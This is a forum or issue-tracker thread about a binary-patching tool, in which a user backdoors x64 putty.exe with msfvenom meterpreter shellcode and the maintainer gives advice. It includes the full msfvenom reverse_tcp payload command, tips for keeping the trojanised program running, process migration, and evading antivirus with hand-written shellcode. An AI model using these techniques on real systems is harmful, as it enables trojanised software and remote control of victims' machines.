multithreading x64

[ShonenNoSeishin]

Hi, Thank you for you work ! Can i ask you to explain me the difficulty to implement the multithreading feature for x64 PE ? Thanks in advance !

[MastMind]

Sure! For x86 multithreading is a special bytecode preamble which inserts before the custom shellcode. The gist of this preamble is calling CreateThread WinAPI function with address of the custom shellcode. I tried to implement this trick with x64, but I couldn't automatize it with any shellcode. The x64 assembler has differences in call convention and memory aligning. I guess it is not possible to make the "silver bullet" here. If you know how to write and debug shellcodes you could add CreateThread call manually. If it's interesting for you I could try to explain how to add this call.

[ShonenNoSeishin]

Thank you for your answer ! I'm sorry but I am not enough good on this topic to help you to add this kind of feature :/ . I would like to thank you for your project because it is well done and help me to understand the topic of binary patching ! I'm currently working on ethical patching project on x64 putty.exe and I wanna add a shellcode to this PE. I have created the shellcode with msfvenom (by specifying the x64 infrastructure) and I have manually added a new section to the PE with this shellcode. After that, I have changed the entrypoint of the binary to point this new section. Now, when I run the exe file, it run the shellcode successfully ! But even if I add a jump instruction to the original entrypoint at the end of my new section (that contains the shellcode), the exe program shutdown after running the shellcode. Do you have any advice for this lab ? I am not pretty good in this topic and I don't really understand all the stack process but I think I have to do something else in order to make putty work after the shellcode has been executed... (I found a lot of documentations that make this lab but only in 32bits...). Note that when I'm creating the payload, I use this command : --> msfvenom --platform windows -p windows/x64/meterpreter/reverse_tcp -f raw EXITFUNC=none -a x64 > backdoor64_NoExit.raw

Here is what I wanna do but this tutorial is in 32bits and I'm searching for 64 (This tutorial use your project but I'm currently trying to do it by hand to understand how it works) : https://medium.com/@lowpold2/how-to-patch-exe-files-4767a5df33c4

Thanks in advance ! (if you wanna contact me in another social network, please let me know)

[MastMind]

You'd used msfvenom shellcodes. Very well! I recommend to use my project for msfvenom shellcodes. But actually msfvenom sometimes produces not so good shellcodes (their issues in the bad exitfunc at the end; it seems that EXITFUNC doesn't matter for meterpreter/reverse_tcp). In your situation I can recommend next options:

1. On your listener machine (where is running msfconsole with multi/handler and connected PAYLOAD meterpreter/reverse_tcp) before running the listener change value for EXITFUNC (just run the command set EXITFUNC none). It could has sense because your generated shellcode by msfvenom is not a real meterpreter/reverse_tcp. It is a stager for downloading the real reverse_tcp from the listener machine. If you will have success and your original program will not close just try to migrate to another process (for example explorer.exe) in the created meterpreter session. It should resume running of the original code.
2. Try other shellcodes from msf like x64/meterpreter/reverse_http or x64/meterpreter/reverse_https (you can get the whole list of available payloads with msfconsole and execute the command search windows/x64/meterpreter). Every payload could be used with msfvenom
3. If it possible please do not create a new section. The modern PE loaders of windows since windows 10 refuse those PE (because de facto only one executable section can exist). Use the my utility with -m resz option instead - it will try to resize the current executable section and deploy the shellcode in this new space

P.S if your are interesting in a real usage of shellcodes I can help in writing shellcode manually (creation of remote powershell console on the victim's machine is easy task). Now I'm working on my new article for medium.com about this topic. Writing manually is a better option because every antivirus can detect msf shellcodes and you have more flexibility to write some features like running within another thread, minimize the final result and etc.

P.S.S Yes, I wanna contact with you. I have not some social media, but you can text to me on email lowpold1@gmail.com

[ShonenNoSeishin]

Thank you so much ! I will come back you tomorrow by email to not spam this issue !

[MastMind]

Thank you for this issue. I'd reviewed my old materials about the shellcoding and I'd found the way to implement x64 thread mode. I'd commited this feature.